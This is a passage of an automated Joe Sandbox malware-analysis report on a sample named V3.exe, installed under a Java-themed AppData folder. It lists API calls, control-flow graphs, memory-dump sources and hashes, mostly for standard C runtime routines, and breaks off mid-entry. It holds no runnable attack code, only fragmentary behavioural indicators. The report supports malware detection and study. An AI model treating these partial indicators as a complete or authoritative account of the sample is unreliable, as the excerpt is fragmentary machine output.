                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Virtual$Alloc$Free$Protect
                                              • String ID: ,
                                              • API String ID: 1004437363-3772416878
                                              • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                              • Instruction ID: f89365abc64248be6907363aa4133c029b2b2ca6de5e108b616e42768d0fb864
                                              • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                              • Instruction Fuzzy Hash: D851F875900609AFCF10DFA9C885B9EBBF8FF08354F10851AF969A7240D370EA54CBA4

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32(00C88A50,?,00C88940,00000000,?,?,00C88A50,A355C656,?,00C88A50), ref: 00C88957
                                              • TerminateProcess.KERNEL32(00000000,?,00C88940,00000000,?,?,00C88A50,A355C656,?,00C88A50), ref: 00C8895E
                                              • ExitProcess.KERNEL32 ref: 00C88970
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 56262cb792c6fdd98c077115b6689c564131978597db5e011687864d158f5382
                                              • Instruction ID: 20f952248a779c669fa9eeace5f259a24847aef6b6a204224a65aca7c7649906
                                              • Opcode Fuzzy Hash: 56262cb792c6fdd98c077115b6689c564131978597db5e011687864d158f5382
                                              • Instruction Fuzzy Hash: 3BD06731000214ABCF017F64DC0DB6D3F26EA41349B544010F91996421CF319955DB85
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00C920C1
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C9226D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000003.1322581708.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C92000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_3_c92000_V3.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction ID: 58d33a2286b1307ecf43942fa3a2943298be9470f27338292b4d4f4598374a42
                                              • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction Fuzzy Hash: ED718B71E0464AEFDF41CF98C985BEEBBF0AB09314F244095E5A5FB241C234AA91DF64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 79 c92098-c920ca VirtualAlloc 80 c92270-c92274 79->80 81 c920d0-c920d4 79->81 82 c920dd-c920e4 81->82 83 c920f1-c920f8 82->83 84 c920e6-c920ef 82->84 86 c920fc-c9210e 83->86 84->82 87 c92110-c92116 86->87 88 c92133-c9213b 86->88 89 c92118 87->89 90 c9211d-c92130 87->90 91 c9213d-c92143 88->91 92 c9219c-c921a2 88->92 95 c92260-c9226d VirtualFree 89->95 90->88 96 c9214a-c92167 91->96 97 c92145 91->97 93 c921a9-c921b0 92->93 94 c921a4 92->94 98 c921b2 93->98 99 c921b7-c921fa 93->99 94->95 95->80 100 c92169 96->100 101 c9216e-c92197 96->101 97->95 98->95 103 c92203-c92209 99->103 100->95 102 c9225b 101->102 102->86 103->102 104 c9220b-c92238 103->104 105 c9223a 104->105 106 c9223c-c92259 104->106 105->102 106->103
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00C920C1
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C9226D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction ID: 58d33a2286b1307ecf43942fa3a2943298be9470f27338292b4d4f4598374a42
                                              • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                              • Instruction Fuzzy Hash: ED718B71E0464AEFDF41CF98C985BEEBBF0AB09314F244095E5A5FB241C234AA91DF64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 108 c8c211-c8c23b 109 c8c23d-c8c23f 108->109 110 c8c241-c8c243 108->110 111 c8c292-c8c295 109->111 112 c8c249-c8c250 call c8c146 110->112 113 c8c245-c8c247 110->113 115 c8c255-c8c259 112->115 113->111 116 c8c278-c8c28f 115->116 117 c8c25b-c8c269 GetProcAddress 115->117 118 c8c291 116->118 117->116 119 c8c26b-c8c276 call c8811b 117->119 118->111 119->118
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06fe14b98b23b8db0bb6fca18f9a539814e89bf25d3200e81a8ae399b90e825c
                                              • Instruction ID: fc45c73e1f580a86bdcc59890c5a85c16fbf34c80725604f2d5be0a665bb746b
                                              • Opcode Fuzzy Hash: 06fe14b98b23b8db0bb6fca18f9a539814e89bf25d3200e81a8ae399b90e825c
                                              • Instruction Fuzzy Hash: 8F01F9332002105B9F15ABEDECC1F5B7365E7C63687204124F9159B194DA30D94597A4
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C855B5
                                              • IsDebuggerPresent.KERNEL32 ref: 00C85681
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C856A1
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C856AB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: c5aea1ab9153def1fcddbfcc968378f4eb72c29dd8123e1ffab48f73ddc6f173
                                              • Instruction ID: 2621a481be625396b0170af640a470487484e39ef7e9f30e54605e376c9e7dce
                                              • Opcode Fuzzy Hash: c5aea1ab9153def1fcddbfcc968378f4eb72c29dd8123e1ffab48f73ddc6f173
                                              • Instruction Fuzzy Hash: A0311A75D05318DBDB10EF64D989BCDBBB8AF04304F10419AE40DAB250EB719A84DF48
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C89BAC
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C89BB6
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C89BC3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 2f7bcc6a0a35ab72832932ec57ee5cf5bd1641e78e10547bb3ccacbd88eda1b8
                                              • Instruction ID: 4eab6468faac5f437fbbc9a7dbdaef36719ecf545970a0ab1efea1fa5907f6ef
                                              • Opcode Fuzzy Hash: 2f7bcc6a0a35ab72832932ec57ee5cf5bd1641e78e10547bb3ccacbd88eda1b8
                                              • Instruction Fuzzy Hash: DC31D2749012289BCB21EF28D889BDDBBB8FF08314F5041EAE41DA7250E7709B85CF48
                                              Memory Dump Source
                                              • Source File: 0000000A.00000003.1322581708.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C92000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_3_c92000_V3.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                              • Instruction ID: a038c646b6034cfeac575c1a50066f44b59d435e7a24f5f0d8d45ffb79ec1308
                                              • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                              • Instruction Fuzzy Hash: 25F06D79A00A00EF8F24CF0AC54CC95B7F6FB9573076545A5E414DB221D3B0EE44DBA1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                              • Instruction ID: a038c646b6034cfeac575c1a50066f44b59d435e7a24f5f0d8d45ffb79ec1308
                                              • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                              • Instruction Fuzzy Hash: 25F06D79A00A00EF8F24CF0AC54CC95B7F6FB9573076545A5E414DB221D3B0EE44DBA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 160 c872d1-c872fc call c87e99 163 c87670-c87675 call c891a7 160->163 164 c87302-c87305 160->164 164->163 165 c8730b-c87314 164->165 167 c8731a-c8731e 165->167 168 c87411-c87417 165->168 167->168 170 c87324-c8732b 167->170 171 c8741f-c8742d 168->171 172 c8732d-c87334 170->172 173 c87343-c87348 170->173 174 c875d9-c875dc 171->174 175 c87433-c87437 171->175 172->173 176 c87336-c8733d 172->176 173->168 177 c8734e-c87356 call c86913 173->177 178 c875de-c875e1 174->178 179 c875ff-c87608 call c86913 174->179 175->174 180 c8743d-c87444 175->180 176->168 176->173 193 c8760a-c8760e 177->193 196 c8735c-c87375 call c86913 * 2 177->196 178->163 182 c875e7-c875fc call c87676 178->182 179->163 179->193 183 c8745c-c87462 180->183 184 c87446-c8744d 180->184 182->179 189 c87468-c8748f call c86cc4 183->189 190 c87579-c8757d 183->190 184->183 188 c8744f-c87456 184->188 188->174 188->183 189->190 202 c87495-c87498 189->202 194 c87589-c87595 190->194 195 c8757f-c87588 call c865a0 190->195 194->179 200 c87597-c875a1 194->200 195->194 196->163 219 c8737b-c87381 196->219 204 c875af-c875b1 200->204 205 c875a3-c875a5 200->205 207 c8749b-c874b0 202->207 209 c875c8-c875d5 call c87d59 204->209 210 c875b3-c875c6 call c86913 * 2 204->210 205->179 208 c875a7-c875ab 205->208 214 c8755a-c8756d 207->214 215 c874b6-c874b9 207->215 208->179 217 c875ad 208->217 227 c87634-c87649 call c86913 * 2 209->227 228 c875d7 209->228 234 c8760f call c890eb 210->234 214->207 220 c87573-c87576 214->220 215->214 221 c874bf-c874c7 215->221 217->210 224 c873ad-c873b5 call c86913 219->224 225 c87383-c87387 219->225 220->190 221->214 226 c874cd-c874e1 221->226 244 c87419-c8741c 224->244 245 c873b7-c873d7 call c86913 * 2 call c87d59 224->245 225->224 230 c87389-c87390 225->230 231 c874e4-c874f5 226->231 257 c8764b 227->257 258 c8764e-c8766b call c86eb7 call c87c59 call c87e16 call c87bd0 227->258 228->179 235 c87392-c87399 230->235 236 c873a4-c873a7 230->236 237 c8751b-c87528 231->237 238 c874f7-c87508 call c877ac 231->238 248 c87614-c8762f call c865a0 call c87960 call c87f46 234->248 235->236 242 c8739b-c873a2 235->242 236->163 236->224 237->231 247 c8752a 237->247 254 c8750a-c87513 238->254 255 c8752c-c87554 call c87251 238->255 242->224 242->236 244->171 245->244 274 c873d9-c873de 245->274 252 c87557 247->252 248->227 252->214 254->238 262 c87515-c87518 254->262 255->252 257->258 258->163 262->237 274->234 276 c873e4-c873f7 call c879b5 274->276 276->248 281 c873fd-c87409 276->281 281->234 282 c8740f 281->282 282->276
                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 00C873F0
                                              • ___TypeMatch.LIBVCRUNTIME ref: 00C874FE
                                              • CatchIt.LIBVCRUNTIME ref: 00C8754F
                                              • _UnwindNestedFrames.LIBCMT ref: 00C87650
                                              • CallUnexpected.LIBVCRUNTIME ref: 00C8766B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 4119006552-393685449
                                              • Opcode ID: 7491a99dfacc17c0c41d9b646fce20c1fc267aaef62a45dfa597410e0385ad7d
                                              • Instruction ID: 694fc79b722ea21ba920f02c7764915414563fbc587242b3ecffcccd08f6936a
                                              • Opcode Fuzzy Hash: 7491a99dfacc17c0c41d9b646fce20c1fc267aaef62a45dfa597410e0385ad7d
                                              • Instruction Fuzzy Hash: A9B1BF71804209DFCF24FFA4C8419AEBB75FF14318B204269F8246B251E334DA11DFA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 283 c863d0-c86421 call c91400 call c86390 call c868c7 290 c8647d-c86480 283->290 291 c86423-c86435 283->291 292 c864a0-c864a9 290->292 293 c86482-c8648f call c868b0 290->293 291->292 294 c86437-c8644e 291->294 298 c86494-c8649d call c86390 293->298 296 c86450-c8645e call c86850 294->296 297 c86464 294->297 305 c86460 296->305 306 c86474-c8647b 296->306 300 c86467-c8646c 297->300 298->292 300->294 303 c8646e-c86470 300->303 303->292 307 c86472 303->307 308 c864aa-c864b3 305->308 309 c86462 305->309 306->298 307->298 310 c864ed-c864fd call c86890 308->310 311 c864b5-c864bc 308->311 309->300 316 c864ff-c8650e call c868b0 310->316 317 c86511-c8652d call c86390 call c86870 310->317 311->310 313 c864be-c864cd call c911e0 311->313 321 c864ea 313->321 322 c864cf-c864e7 313->322 316->317 321->310 322->321
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00C86407
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C8640F
                                              • _ValidateLocalCookies.LIBCMT ref: 00C86498
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C864C3
                                              • _ValidateLocalCookies.LIBCMT ref: 00C86518
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 447855caa1277fb177eee459a27caa4790849fc0b4788bd38c7e5f682fae6ed4
                                              • Instruction ID: ea661366727beb88e9c0a4e6659ca3dae7a5dd08f6ec930108a4268d45529dc3
                                              • Opcode Fuzzy Hash: 447855caa1277fb177eee459a27caa4790849fc0b4788bd38c7e5f682fae6ed4
                                              • Instruction Fuzzy Hash: 60419634A00219ABCF10EF68C845A9EBBB5AF4532CF148165ED296B392D731EB05CB94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 329 c86921-c86928 330 c8692a-c8692c 329->330 331 c8692d-c86948 GetLastError call c86c04 329->331 334 c8694a-c8694c 331->334 335 c86961-c86963 331->335 336 c869a7-c869b2 SetLastError 334->336 337 c8694e-c8695f call c86c3f 334->337 335->336 337->335 340 c86965-c86975 call c891eb 337->340 343 c86989-c86999 call c86c3f 340->343 344 c86977-c86987 call c86c3f 340->344 350 c8699f-c869a6 call c89127 343->350 344->343 349 c8699b-c8699d 344->349 349->350 350->336
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00C86918,00C8674C,00C8578C), ref: 00C8692F
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C8693D
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C86956
                                              • SetLastError.KERNEL32(00000000,00C86918,00C8674C,00C8578C), ref: 00C869A8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: eb0fd206248edcb3d0302f75c16a04e22fda446412fc59ecd2141ef351897a91
                                              • Instruction ID: eb89008400b4b31f1101200ac41d5a2965c9c7f5f6f6ca98b58679617ba03924
                                              • Opcode Fuzzy Hash: eb0fd206248edcb3d0302f75c16a04e22fda446412fc59ecd2141ef351897a91
                                              • Instruction Fuzzy Hash: FD0184336093125EAA1537B9AC8A72F26A5EB0A7BD7200229F230571E0FF715C01E35D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 353 c8a6eb-c8a6f6 354 c8a6f8-c8a702 call c8a7d4 353->354 355 c8a707-c8a70d 353->355 363 c8a7aa-c8a7ac 354->363 356 c8a70f-c8a715 355->356 357 c8a734-c8a749 call c8b2b9 355->357 359 c8a728-c8a732 356->359 360 c8a717-c8a722 call c8a7ad 356->360 368 c8a74b-c8a75f GetLastError call c89d37 call c89d91 357->368 369 c8a761-c8a768 357->369 365 c8a7a9 359->365 360->359 360->365 365->363 368->365 371 c8a76a-c8a774 call c8a7ad 369->371 372 c8a776-c8a78a call c8a542 369->372 371->372 379 c8a7a8 371->379 380 c8a78c-c8a7a0 GetLastError call c89d37 call c89d91 372->380 381 c8a7a2-c8a7a6 372->381 379->365 380->379 381->379
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe, xrefs: 00C8A707
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe
                                              • API String ID: 0-534682801
                                              • Opcode ID: 0d3c1cfc3d7d9ffdcb951bb60ac7f1608307b94cfa9b34714442ada13a4d3144
                                              • Instruction ID: cb23736f3d6854e2e4664a3421116ed3207319f86fbde57d1990837fe4581140
                                              • Opcode Fuzzy Hash: 0d3c1cfc3d7d9ffdcb951bb60ac7f1608307b94cfa9b34714442ada13a4d3144
                                              • Instruction Fuzzy Hash: FC216D31600605BFAB20BF65DC80A6B77B9EF4036D7108526F826D7151DB30FD50B7AA
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A355C656,?,?,00000000,00C914CF,000000FF,?,00C8896C,00C88A50,?,00C88940,00000000), ref: 00C889C5
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C889D7
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C914CF,000000FF,?,00C8896C,00C88A50,?,00C88940,00000000), ref: 00C889F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: aad7742f132fdc104d78733f28345abd61d5ce404dc3ac297db873fce620011e
                                              • Instruction ID: 7f7893b85bc82dda9c73d063ae449f11ea7bf2773d2c07c2e0113082af6bdaa8
                                              • Opcode Fuzzy Hash: aad7742f132fdc104d78733f28345abd61d5ce404dc3ac297db873fce620011e
                                              • Instruction Fuzzy Hash: 4C016232A40626AFDB159B54CC05BAEBBB9FB05B18F000625ED21A2690DF749904CB95
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?), ref: 00C8769B
                                              • CatchIt.LIBVCRUNTIME ref: 00C87781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C30000, based on PE: true
                                              • Associated: 0000000A.00000002.1327818880.0000000000C30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327880482.0000000000C92000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327897453.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327912247.0000000000CA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1327928478.0000000000CAB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_c30000_V3.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CatchEncodePointer
                                              • String ID: MOC$RCC
                                              • API String ID: 1435073870-2084237596
                                              • Opcode ID: 3334fffe365c5eeb709bed31fc5bd8739038e84d69b4937c470b4dd4699a7406
                                              • Instruction ID: 4316c5717da21b5c997a0ffefe8c1cb4dfdf84f404fae175c209b1ddea877ea7
                                              • Opcode Fuzzy Hash: 3334fffe365c5eeb709bed31fc5bd8739038e84d69b4937c470b4dd4699a7406
                                              • Instruction Fuzzy Hash: 16416072900109AFDF16EF98CD81AEEBBB5FF48308F244199F914A7251E335DA50DB58
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C86AF4,00000000,?,00CA9C78,?,?,?,00C86C97,00000004,InitializeCriticalSectionEx,00CA2CC0,InitializeCriticalSectionEx), ref: 00C86B50
